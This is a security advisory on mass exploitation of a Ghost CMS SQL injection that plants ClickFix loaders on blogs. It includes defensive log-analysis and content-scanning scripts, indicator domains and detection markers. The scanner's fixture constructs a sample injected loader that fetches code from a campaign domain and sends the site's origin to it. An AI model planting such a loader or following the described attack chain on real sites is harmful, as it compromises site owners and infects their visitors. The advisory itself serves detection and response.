Active Exploitation Alert: Ghost CMS CVE-2026-26980 Mass Attack Hijacks 700+ Sites for ClickFix Malware Campaigns

Executive Summary

A critical vulnerability, CVE-2026-26980, has been actively exploited in the wild, targeting the Ghost CMS platform. This unauthenticated blind SQL injection flaw in the Ghost CMS Content API (versions 3.24.0 through 6.19.0) has enabled threat actors to compromise over 700 websites globally. Attackers have leveraged this vulnerability to extract administrative credentials, inject malicious JavaScript into site content, and orchestrate large-scale "ClickFix" social engineering campaigns. These attacks redirect site visitors to counterfeit Cloudflare CAPTCHA pages, ultimately tricking users into executing malware that can steal credentials and establish persistent access. The campaign demonstrates a sophisticated blend of automated exploitation, advanced payload delivery, and effective user deception, underscoring the urgent need for immediate patching and comprehensive incident response.

Threat Actor Profile

The exploitation of CVE-2026-26980 is attributed to multiple financially motivated cybercriminal groups rather than a single advanced persistent threat (APT). Analysis of the attack infrastructure and payloads reveals at least two distinct clusters of activity, each utilizing unique sets of malicious domains and payload delivery mechanisms. These groups exhibit high technical proficiency, employing automated mass exploitation tools, leveraging commercial cloaking services such as Adspect to evade detection, and rapidly evolving their malware to bypass endpoint security solutions. Some overlap in tactics, techniques, and procedures (TTPs) has been observed with actors previously associated with the Aeternum campaign, though no direct attribution has been established. The threat actors demonstrate a strong focus on scalability, automation, and maximizing monetization through credential theft and potential lateral movement within compromised organizations.

Technical Analysis of Malware/TTPs

The attack chain begins with automated reconnaissance to identify vulnerable Ghost CMS instances. Exploiting the unauthenticated blind SQL injection in the Content API, attackers extract the Admin API Key directly from the backend database. Because an Admin API key authenticates requests on its own, with no password or multi-factor step involved, possession of the key is equivalent to full administrative access via the Ghost Admin API, and the attackers use it to modify published articles in bulk. Malicious JavaScript is appended to the content of each post, typically obfuscated with base64 encoding and loaded dynamically at runtime rather than written into the page as a plain script tag.

The injected JavaScript acts as a loader, fetching a second-stage script from attacker-controlled domains such as clo4shara[.]xyz, cloud-verification[.]com, staticcloudflare[.]pro, and others. This script performs user-agent and referrer checks to evade automated scanners and security crawlers. Legitimate visitors are redirected to a counterfeit Cloudflare CAPTCHA page, which is visually indistinguishable from the real service. The page instructs users to press WIN+R and paste a command that downloads and executes a ZIP archive containing a malicious DLL or executable (e.g., NotepadPlusPlus.dll, UtilifySetup.exe).

The malware payloads are primarily stealer trojans, designed to exfiltrate browser credentials, session cookies, and system information. Some variants are built using the Electron framework and persist on Windows through Electron's app.setLoginItemSettings API, which registers the application to start at user login. The malware establishes command-and-control (C2) communication over HTTPS, regularly beaconing to attacker infrastructure for further instructions or payload updates. Payloads are frequently updated to evade antivirus detection, with several samples exhibiting zero detections on VirusTotal at the time of discovery.

Key technical indicators include injected <script> tags in article bodies containing atob(, appendChild, or btoa(a.origin), and abnormal PUT /ghost/api/admin/posts/:id/ requests in server logs. The content markers are heuristics rather than proof of compromise (legitimate embeds also call appendChild), so a hit should be confirmed by decoding any base64 payload and checking the domains it references; the stronger signal in logs is a single source updating many distinct posts within minutes, which is how the automated injection appears. The attack demonstrates a high degree of automation, with scripts capable of scanning, exploiting, and mass-injecting hundreds of sites within hours.
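The log-side indicator above, worked through as an added example (not Rescana's or Ghost's code): the script parses access-log lines in the combined format most nginx front-ends for Ghost write by default, keeps only PUT requests to the post-update endpoint, and flags any source address that touched at least five distinct post IDs inside a five-minute window. The log lines, IP addresses, post IDs, and the window and threshold values are all constructed for illustration; tune the threshold to what your editors actually do.

```python
"""Flag bulk Admin API post modifications in Ghost access logs.

Added example, not code from Rescana or the Ghost project. Assumes a
combined-format access log and that editors rarely update many posts
within a few minutes. Sample lines and thresholds are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One combined-format line: ip ident user [ts] "METHOD path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# Post-update endpoint from the advisory; Ghost post ids are 24 hex chars.
POST_PATH_RE = re.compile(r"^/ghost/api/admin/posts/(?P<id>[0-9a-f]{24})/?(?:\?.*)?$")

# Constructed sample: one editor saving two posts over a few minutes, then
# a scripted client rewriting six different posts in under twenty seconds.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2026:09:58:40 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293b01/ HTTP/1.1" 200 812 "https://blog.example/ghost/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [12/Mar/2026:10:01:13 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293b02/ HTTP/1.1" 200 790 "https://blog.example/ghost/" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [12/Mar/2026:10:05:01 +0000] "GET /ghost/api/content/posts/?key=abc&limit=all HTTP/1.1" 200 40133 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:02 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a01/ HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:05 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a02/ HTTP/1.1" 200 833 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:08 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a03/ HTTP/1.1" 200 801 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:11 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a04/ HTTP/1.1" 200 845 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:14 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a05/ HTTP/1.1" 200 799 "-" "python-requests/2.31"
198.51.100.9 - - [12/Mar/2026:10:05:19 +0000] "PUT /ghost/api/admin/posts/65f1a0c3d4e5f60718293a06/ HTTP/1.1" 200 820 "-" "python-requests/2.31"
"""


def parse_admin_post_updates(log_text):
    """Return (ip, timestamp, post_id, status, user_agent) for every PUT to a post."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "PUT":
            continue
        p = POST_PATH_RE.match(m["path"])
        if not p:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["ip"], ts, p["id"], int(m["status"]), m["ua"]))
    return events


def find_bulk_editors(events, window=timedelta(minutes=5), threshold=5):
    """Map each source IP that updated >= threshold distinct posts within any
    `window`-long span to the sorted list of every post id it touched.
    Failed PUTs (non-2xx) are counted too: a burst of rejected updates is
    worth a look as well."""
    by_ip = defaultdict(list)
    for ip, ts, pid, _status, _ua in events:
        by_ip[ip].append((ts, pid))
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            ids = {pid for ts, pid in evs[i:] if ts - start <= window}
            if len(ids) >= threshold:
                flagged[ip] = sorted({pid for _, pid in evs})
                break
    return flagged


if __name__ == "__main__":
    for ip, ids in find_bulk_editors(parse_admin_post_updates(SAMPLE_LOG)).items():
        print(f"{ip}: {len(ids)} posts modified in a burst -> review these ids")
        for pid in ids:
            print("  ", pid)
```

On a real host, feed it the nginx access log and compare the flagged source against the addresses your editors and CI actually use; the GET against the Content API immediately before the burst is the enumeration step and a useful secondary pivot.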

Exploitation in the Wild

The exploitation campaign has impacted a diverse array of organizations, including prominent universities (such as Harvard and Oxford), SaaS providers, fintech firms, AI and machine learning startups, media outlets, and cybersecurity research blogs. The majority of compromised sites are personal blogs and independent publishers, but the breadth of affected sectors highlights the indiscriminate nature of the attack.

Threat actors have demonstrated agility in their operations, with multiple groups competing for control over compromised sites. In several instances, one group’s payloads have overwritten those of another, indicating a lack of coordination and a race to monetize access. The campaign has evolved rapidly, with initial payloads serving as statistical probes or benign test scripts, later replaced by fully weaponized stealers and remote access tools.

The attackers’ use of commercial cloaking services and dynamic payload delivery has complicated detection and response efforts. Many compromised sites remained infected for days or weeks before remediation, exposing thousands of visitors to the risk of malware infection and credential theft.

Victimology and Targeting

Analysis of the campaign reveals a global footprint, with confirmed victims in the United States, United Kingdom, European Union, Brazil, India, and other regions. The most heavily impacted sectors include personal blogs and independent sites, software development and SaaS companies, AI and machine learning organizations, Web3 and cryptocurrency platforms, educational institutions, media and publishing outlets, cybersecurity firms, and fintech providers.

The attackers have not demonstrated specific targeting based on sector or geography; rather, their approach is opportunistic, exploiting any vulnerable Ghost CMS instance discovered during automated scans. The inclusion of high-profile academic and technology organizations among the victims increases the risk of downstream compromise, as these sites often serve as trusted sources for a wide audience.

Mitigation and Countermeasures

Immediate action is required to mitigate the risk posed by CVE-2026-26980. All organizations running Ghost CMS versions 3.24.0 through 6.19.0 must upgrade to version 6.19.1 or later, which contains the official patch for this vulnerability. Patching alone does not evict an attacker who already holds an Admin API key extracted before the upgrade, so organizations should also rotate all Admin API Keys, administrative passwords, and session tokens, as these may have been compromised during the attack.

A comprehensive review of site content is essential to identify and remove injected JavaScript from articles and theme files. This may require direct database queries against the posts table or the use of specialized content scanning tools. Server logs should be retained, and at least the 30 days preceding remediation analyzed, focusing on abnormal Admin API activity and connections to known malicious domains and URLs, including clo4shara[.]xyz, cloud-verification[.]com, staticcloudflare[.]pro, and others listed in the Indicators of Compromise (IOCs) section.
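The content review, as an added example (not Rescana's or Ghost's code): it queries a posts table for rendered HTML, pulls out every script block, decodes any base64 literal passed to atob() so that the domain a loader will fetch from is visible, and grades each hit by whether it reaches a domain on the advisory's indicator list. Ghost stores rendered post HTML in a column named html, which is all the query relies on; the in-memory SQLite table built here is a constructed stand-in with only the columns the scan needs, and the three post bodies are constructed samples (one clean, one with a benign first-party embed that trips a marker, one carrying a loader of the shape the advisory describes).

```python
"""Triage Ghost post content for injected loaders and the domains they reach.

Added example, not code from Rescana or the Ghost project. Relies only on
the posts table having an html column; the SQLite table and post bodies
below are constructed stand-ins. Indicator domains are from the advisory.
"""
import base64
import re
import sqlite3

IOC_DOMAINS = {"clo4shara.xyz", "cloud-verification.com", "staticcloudflare.pro"}
MARKERS = ("atob(", "appendChild", "btoa(a.origin)")  # strings named in the advisory

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
B64_LIT_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def matches_ioc(host):
    """True for an indicator domain or any subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def decode_b64_literals(script_text):
    """Decode every base64 string literal passed to atob(); skip undecodable ones."""
    decoded = []
    for lit in B64_LIT_RE.findall(script_text):
        try:
            padded = lit + "=" * (-len(lit) % 4)
            decoded.append(base64.b64decode(padded).decode("utf-8", "ignore"))
        except ValueError:
            continue
    return decoded


def classify(finding):
    if finding["ioc_hits"]:
        return "high"       # reaches a known campaign domain
    if "atob(" in finding["markers"] and finding["hosts"]:
        return "medium"     # base64-hidden URL, domain not (yet) on the list
    return "low"            # marker string only; verify by hand


def scan_html(html):
    """Return one finding per suspicious <script> block in a post body."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        texts = [script] + decode_b64_literals(script)
        hosts = {h.lower() for t in texts for h in HOST_RE.findall(t)}
        markers = {m for m in MARKERS if m in script}
        ioc_hits = {h for h in hosts if matches_ioc(h)}
        if not markers and not ioc_hits:
            continue  # ordinary inline script, nothing indicative
        finding = {"markers": markers, "hosts": hosts, "ioc_hits": ioc_hits}
        finding["severity"] = classify(finding)
        findings.append(finding)
    return findings


def scan_posts(conn):
    """Scan every post, most recently updated first, since the injection is recent."""
    rows = conn.execute("SELECT id, title, html, updated_at FROM posts ORDER BY updated_at DESC")
    results = []
    for pid, title, html, updated in rows:
        for f in scan_html(html or ""):
            results.append({"id": pid, "title": title, "updated_at": updated, **f})
    return results


def build_sample_db():
    """Constructed stand-in for Ghost's posts table with three sample bodies."""
    loader_target = base64.b64encode(b"https://clo4shara.xyz/loader.js").decode()
    injected = (
        "<p>Original article text.</p>"
        '<script>var a=window.location,u=atob("' + loader_target + '");'
        'var s=document.createElement("script");s.src=u+"?o="+btoa(a.origin);'
        "document.head.appendChild(s);</script>"
    )
    legit = (
        "<p>Clean post with a first-party analytics embed.</p>"
        '<script>var s=document.createElement("script");'
        's.src="https://cdn.example.org/analytics.js";document.body.appendChild(s);</script>'
    )
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id TEXT PRIMARY KEY, title TEXT, html TEXT, updated_at TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?, ?)", [
        ("65f1a0c3d4e5f60718293a01", "Welcome", "<p>No scripts here.</p>", "2026-03-01 09:00:00"),
        ("65f1a0c3d4e5f60718293a02", "Analytics", legit, "2026-03-02 09:00:00"),
        ("65f1a0c3d4e5f60718293a03", "Q1 roadmap", injected, "2026-03-12 10:05:02"),
    ])
    return conn


if __name__ == "__main__":
    for r in scan_posts(build_sample_db()):
        print(f'[{r["severity"]}] {r["id"]} "{r["title"]}" updated {r["updated_at"]}: '
              f'markers={sorted(r["markers"])} hosts={sorted(r["hosts"])}')
```

Against a live install, replace build_sample_db() with a connection to the production database (the same SELECT works on MySQL) and treat the "low" results as a review queue rather than a verdict; the appendChild marker alone matches ordinary embeds, which is exactly why the decoded domain is what decides the grade.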

Organizations should notify users who accessed the site during the infection window, advising them to scan their systems for malware and reset credentials as a precaution. Endpoint detection and response (EDR) solutions should be updated with the latest IOCs, including the MD5 hashes 5659292833ec421da11ebde005d9c9a8 and d30cc10d54ebc967c8538ff74f442eee.

To enhance resilience against similar attacks, organizations are encouraged to implement web application firewalls (WAFs), enforce least-privilege access controls, and monitor for anomalous API usage. Regular vulnerability scanning and prompt patch management are critical to reducing exposure to mass exploitation campaigns.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify vulnerabilities, respond to emerging threats, and ensure compliance with industry standards. For more information about how Rescana can help safeguard your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.